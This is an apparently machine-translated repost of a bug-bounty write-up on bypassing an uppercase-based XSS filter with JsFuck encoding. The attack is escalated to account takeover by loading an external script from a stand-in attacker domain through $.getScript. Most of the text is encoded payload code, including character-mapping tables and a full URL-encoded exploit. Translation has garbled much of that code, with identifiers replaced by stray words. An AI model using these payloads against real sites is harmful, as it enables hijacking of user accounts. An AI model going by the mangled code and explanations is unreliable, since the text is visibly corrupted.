Shulou(Shulou.com)05/31 Report--

This article shows you how to bypass XSS filters like PRO, which is concise and easy to understand. I hope you can learn something from the details of this article.

If there is a code injection vulnerability in the JavaScript code, it is really a headache, because this project is not our penetration testing project for the enterprise environment, so we can directly release the technical details to everyone.

In short, we found a security vulnerability on a website, and after a period of code analysis, we successfully found a node with a XSS vulnerability:

Http://website.com/dir/subdir

In the JavaScript code for this node, you have the following code:

Function ("/ DIR/SUBDIR", params)

After using Burp Suite scanning, we found that adding "- alert (1) -" (http://website.com/dir/subdir/"-alert(1)-") at the end of the URL would reflect XSS, and the browser would tell us "unable to find function ALERT (1)":

So next, we need to test what the server is filtering out, such as "", "/", "\" or ".".

Look for available Payload

We also found some solutions, all of which are related to jsfuck.com.

Of course, we can also execute "alert (1)" once on this site, but this is only a low-risk XSS, and we want to elevate this vulnerability to a high-risk or serious vulnerability. To achieve this, we will need to load an external JS file and be able to execute arbitrary Web behavior without any user interaction.

The following figure shows a WordPress Payload. Our goal is to load an external JS file in the target website and change the account password and mailbox:

To make a JsFuck Payload, in the JsFuck code, the simple "alert (1)" is converted to:

"-% 5B%5D%5B (!% 5B%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%2B (!% 5B%5D%2B%5B%5D)% 5B% 5B% 5D% 2B% 5B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 2B% 5B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 2B% 5B% 5D% 5D% 5D% 5D% 5D% 5D% 5D% 5D% 5D% 5D% 5D% 5D% 5D% 5D% 5D% 5D% 5D% 5D% 5B (% 5B%5D%2B%5B%5D%5B (!% 5B%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%2B (!% 5B%5D%2B%5B%5D)% 5B% 5B% 5D% 2B% 5B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 2B% 5B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 2B% 5B% 5B% 5D%5D%5D)% 5B% 5B% 5D% 2B% 2B% 2B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D%5B (!% 5B%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%2B (!% 5B%5D%2B%5B%5D)% 5B% 5B% 5D% 2B% 5B% 5D% 2B (!% 5B%5D%2B%5B%5D) % 5B% 2B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%5D)% 5B% 2B% 5B% 5D% 2B% 2B% 5B% 5D% 5D% 2B (% 5B%5D%5B%5B%5D%5D%2B%5B%5D)% 5B% 2B% 5B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 5B% 5B % 5D% 2B% 5B% 5D% 2B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%2B (!% 5B%5D%2B%5B%5D)% 5B% 2B% 5D% 5D% 2B (% 5B%5D%5B%5B%5D%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%2B (% 5B% 5D% 2B% 5B% 5D%) 5B (!% 5B%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%2B (!% 5B%5D%2B%5B%5D)% 5B% 5B% 5D% 2B% 2B% 5B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 2B% 5B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%5D)% 5B% 5B% 5B% 5D% 2B / 5B%5D%2B%5B%5D% 5B% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%2B (!% 5B%5D%2B%5B%5D%5B (!% 5B%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%2B (!% 5B%5D%2B%5B%5D)% 5B% 5B% 5D% 2B% 5B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 2B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%5D)% 5B% 2B% 5B% 5D% 2B% 5B% 2B% 5B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 2B% 2B% 5D% 5D ((!!% 5B%5D%2B%5B)% 5B% 5D% 5D) % 5D)% 5B% 2B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 5B% 5D% 2B% 5B% 5D% 2B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%2B (% 5B%5D%5B%5B%5D%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%2B (! % 5B%5D%2B%5B%5D)% 5B% 2B percent 5D% 5D% 2B (% 5B%5D%5B%5B%5D%5D%2B%5B%5D)% 5B% 2B% 2B% 2B% 5D% 5B% 5D% 2B (!% 5B%5D%2B%5B%5D%5B (!% 5B%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%2B (!% 5B%5D%2B%5B%5D)% 5B% 5B% 5D% 2B% 5B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 2B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B%2B%5B%5D%5D%5D)% 5B% 5B% 5D% 2B% 5B% 5D% 2B% 2B% 5B% 5D% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 2B% 5B% 5D% 5B% 5D % 5D%2B (!% 5B%5D%2B%5B%5D)% 5B% 5D% 2B% 5B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 5D% 5D% 2B% 2B% 5D% 5D% 2B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 2B% 5B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D)% 5B% 2B% 5D% 5D% 2B (!% 5B%5D%2B%5B%5D) )% 5B%2B%5B%5D%5D) () (% 2B% 5B% 5D)-"

If I want to implement "alert ([xss_clean])", the entire JsFuck code is estimated to be more than 13000 characters. I found that as long as there are more than 2500-2700 characters, the server of the target site will return "error 400".

Next, Let's study the working mechanism of JsFuck: const SIMPLE = {'false':'! []', 'true':'! 0mm, 'undefined':' 0 [0]', 'NaN':' + [! 0]' 'Infinity':' + (+! 0 + (! 0 + []) [! 0] + [0] + [0] + [0] + [0] + [0])'/ / + "1e1000"} Const CONSTRUCTORS = {'Array':' []', 'Number':' (+ 0)', 'String':' ([] + [])', 'Boolean':' (! 0)', 'Function':' [] ["fill"]', 'RegExp':' Function ("return/" + 0 + "/") ()'} Const MAPPING = {'averse:' (false+ ") [1]', 'baked:' ([] [" entries "] () +") [2]', 'fill:' ([] [] "fill"] + ") [3]', 'undefined+:' (undefined+") [2]', 'eBay:' (true+") [3]' 'fags: (false+ ") [0]', 'String:' (false+ [0] + String) [20], 'hacks:' (+ (101)) [" to "+ String [" name "]] (21) [1]', 'iTunes:' ([false] + undefined) [10]', 'jacks:' ([] [" entries "] () +") [3]' 'to:' (+ (20)) ["to" + String ["name"]] (21)', 'lump:' (false+ "") [2]', 'Number+:' (Number+ ") [11]', 'nasty:' (undefined+") [1]', 'oasis:' (true+ [] ["fill"]) [10]' ["to" + String ["name"]] (31) [1]', and then Execute part of the code in Chrome:

In general, we can "wrap" these strings directly with different types of variables, so we can use lowercase characters to store keyword strings like false, true, undefined, NaN, and Infinity.

Next, I want to avoid using lowercase characters: Á =! []; / false É =!! []; / / true mesh = [] [[]]; / / undefined = + [!]]; / / NaNSI=+ (+! + [] + (! + []) [! + [] + [] + + [] + []] + [+ + []]) + [+ []]); / / InfinityST= ([] + []) / / Ü = (+ []); A = (Á + ") [1]; D = (arrow +") [2]; E = (É + ") [3]; F = (Á +") [0] G = [! [] + [+ []] + [+ []] [[! [] + {}] [+ []] [+ []] [+ [+ [] + [[] + {}] [+ []] [+! + []] + [[] [] + []] [+ [+]] [+ [+]] + [! + []] [+ []] [! + []] [+ []] ! + [[]] + [+ []] [+ [+ [] + [! []] [+ []] [+ []] + {}] [+ []] [+! + []] + [! [] + [] [+ [] [+ []] [! + [] + [+ [] I = (Á + ") [10]; L = (Á +") [2]; T = (É + ") [0]; O = (É + [] [F+I+L+L]) [10]; R = (É +") [1]; N = (arrow + ") [1]; M = (+) [Trouo +" S "+ T+R+I+N+G] (31) [1]; P = (+) [Trouo +" S "+ T+R+I+N+G] (31) [1]; S = (Á +") [3]; U = (Arrow + ") [0] V = (+ (31)) [Tosco + "S" + T+R+I+N+G] (32); X = (+ (101)) [Trouo + "S" + T+R+I+N+G] (34) [1]; Y = (ID + [SI]) [10]; Z = (+ (35)) [Trouo + "S" + T+R+I+N+G] (36); C = ([] [F+I+L+L] + ") [3]; H = (+ (101)) [Trouo +" S "+ T+R+I+N+G] (21) [1]; K = (+ (20)) [Trouo +" S "+ T+R+I+N+G] (21) W = (+ (32)) [Tosco + "S" + T+R+I+N+G] (33); J = ([] [E+N+T+R+I+E+S] () + ") [3]; B = ([] [E+N+T+R+I+E+S] () +") [2]

Of course, I also need to use "." And "/", here I can use the floating-point value 1.1e+101 to get ".":

Very good, what we want. I already have, and it's still short of "/" and "g". Considering the existence of uppercase filters, I intend to use JsFuck, so I have to sacrifice 1200 characters, but this Payload is only 500,800 characters, which is still some way from the final limit.

Now that we have all the characters we need, it's time to execute our Payload:

[] [F+I+L+L] [C+O+N+S+T+R+U+C+T+O+R] (A+L+E+R+T (1)) ()

The above JsFuck code will be translated into "fill.constructor (alert (1))" and our JavaScript files will be executed in uppercase letters, which is very good!

I pray that our target site uses JQuery and loads at the end of the page's HTML code, so after the injection is complete, wait three seconds to load all dependent components, and finally execute $.getScript to load our external JS file.

[] [F+I+L+L] [C+O+N+S+T+R+U+C+T+O+R] ("SLA+SLA+ test" + SLA+ "test') ();}, 3000) ()

After waiting for three seconds, we successfully got the test/test request! Next, use the URL encoding to encode the Payload, and the final Payload is as follows:

% 3B% C3% 81customers! []% 3B% C3% 8D = [] []]% 3B%C3%93=%2B [! []]% 3BSI=%2B (% 2B% 2B []% 2B []% 2B []) [!% 2B []% 2B []) [!% 2B []% 2B []% 2B []% 2B []% 2B []% 2B []% 2B []% 2B []% 2B [] % 2B [])% 3BST = ([]% 2B [])% 3B% C3% 9C = (% 2B [])% 3BA = (% C3%81%2B%22%22) [1]% 3BD%20=%20 (% C3%8D%2B%22%22) [2]% 3BE%20=%20 (% C3%89%2B%22%22) [3]% 3BF%20=%20 (% C3%81%2B%22%22) [0]% 3BG%20=%20 [! []% 2B [% 2B []]% 2B []% 2B [] [% 2B []] [[!]% 2B%7B%7D] [% 2B []] [% 2B []% 2B []% 2B []% 2B []]% 2B []% 2B%7B%7D] [% 2B []] [% 2Billing% 2B []]% 2B [[]]% 2B []] [% 2B []] [% 2B []]% 2B []% 2B [! []% 2B [] [% 2B []] [% 2B []% 2B []% 2B []% 2B []% 2B []% 2B []] [% 2B []] [% 2B []] [% 2B []] [% 2B []]% 2B []] [% 2B []] [% 2B []] [% 2B []] [% 2B []]% 2B []]% 2B []% 2B []% 2B []% 2B []% 2B []% 2B []% 2B []% 2B []% 2B []% 2B []% 2B []% 2B [] ] [% 2B []] [% 2B []% 2B []]% 2B [! []% 2B []] [% 2B []] [% 2B []] [% 2B []] [% 2B []]% 2B [] [% 2B []] [% 2B% 2B []]% 2B [! []% 2B []] [% 2B []] [% 2B []] [% 2B []% 2B []] [% 2B []% 2B []% 2B []% 2B [] 2B []% 2B [% 2B []]% 3BI%20=%20 ([% C3% 81]% 2B%C3%8D) [10]% 3BL%20=%20 (% C3%81%2B%22%22) [2]% 3BT%20=%20 (% C3%89%2B%22%22) [0]% 3BO%20=%20 (% C3% 89% 2B [] [F%2BI%2BL%2BL]) [10]% 3BR%20=%20 (% C3%89%2B%22) % 22) [1]% 3BN%20=%20 (% C3%8D%2B%22%22) [1]% 3BM%20=%20 (% 2B (208)) [T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG] (31) [1]% 3BP%20=%20 (% 2B (211)) [T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG] (31) [1]% 3BS%20=%20 (% C3% 81% 2B) % 22% 22) [3]% 3BU%20=%20 (% C3%8D%2B%22%22) [0]% 3BV%20=%20 (% 2B (31)) [T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG] (32)% 3BX%20=%20 (% 2B (31)) [T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG] (34) [1]% 3BY%20=%20 (% C3% 93% 2B [ SI]) [10]% 3BZ%20=%20 (% 2B (35)) [T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG] (36)% 3BC%20=%20 ([] [F%2BI%2BL%2BL]% 2B%22%22) [3]% 3BH%20=%20 (% 2B (101)) [T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG] (21) [1]% 3BK%20=%20 (% 2B) (20) [T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG] (21)% 3BW%20=%20 (% 2B (32)) [T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG] (33)% 3BJ%20=%20 ([] [E%2BN%2BT%2BR%2BI%2BE%2BS] ()% 2B%22%22) [3]% 3BB%20=%20 ([] [E%2BN%2BT%2BR%2BI]) % 2BE%2BS] ()% 2B%22%22) [2]% 3BDOT%20=%20 (% 2B (% 2211E100%22)% 2B []) [1]% 3BSLA = (! []% 2B [% 2B! []) [([! []% 2B [] []) [% 2B% 2B []% 2B []]% 2B [! []% 2B []) [% 2B []]% 2B []) [% 2B []% 2B []) [% 2B []]% 2B []) [% 2B []) 2Billing% 2B []]% 2B (! []% 2B []) [!% 2B []% 2B []]% 2B ([! []]% 2B [] []]% 2B [] []% 2B []]% 2B [% 2B []% 2B ([] [[]% 2B []) [% 2B []]) [% 2B []% 2B []]) [% 2B [] []]% 2B []% 2B []] ]% 2B (! []% 2B []) [!% 2B []% 2B []]% 2B (! []% 2B []) [% 2B []]% 2B [! []% 2B []% 2B []) [!% 2B []% 2Baring% 2B []% 2B []% 2B []% 2B []) [! []% 2B []% 2B []]% 2B []) [!% 2B []% 2B []% 2B []% 2B []% 2B! % 2B []]% 2B (! []% 2B []) [!% 2B []% 2B% 2B []% 2B% 2B []] () [% 2B% 2B []% 2B []% 3B [] [] [F%2BI%2BL%2BL] [C%2BO%2BN%2BS%2BT%2BR%2BU%2BC%2BT%2BO%2BR] (S% 2BE% 2BT% 2B% 22T% 22% 2BI% 2BM% 2be% 2BO% 2BU% 2BT% 2B% 22 (% 22%2BF%2BU%2BN%2BC%2BT%2BI%2BO%2BN%2B%22 ()% 7B%20 $% 22%2BDOT%2BG%2BE%2BT%2B%22S%22%2BC%2BR%2BI%2BP%2BT%2B%22 ('% 22% 2BSLA% 2BSLA% 2B% 22BADASSDOMAIN% 22% 2BDOT% 2B% 22com% 22% 2BSLA% 2B% 22BADASSURL') ()% 3B%20%7D 203000) 3B%22) () 3B (22

We successfully loaded the external JS file in the target site, and our external JS file can change the user password of the target account!

Summary

The vulnerability could allow an attacker to take over an account and elevate a low-risk XSS vulnerability to a high-risk vulnerability, which received a $1000 vulnerability reward.

The above is how to bypass XSS filters like PRO. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.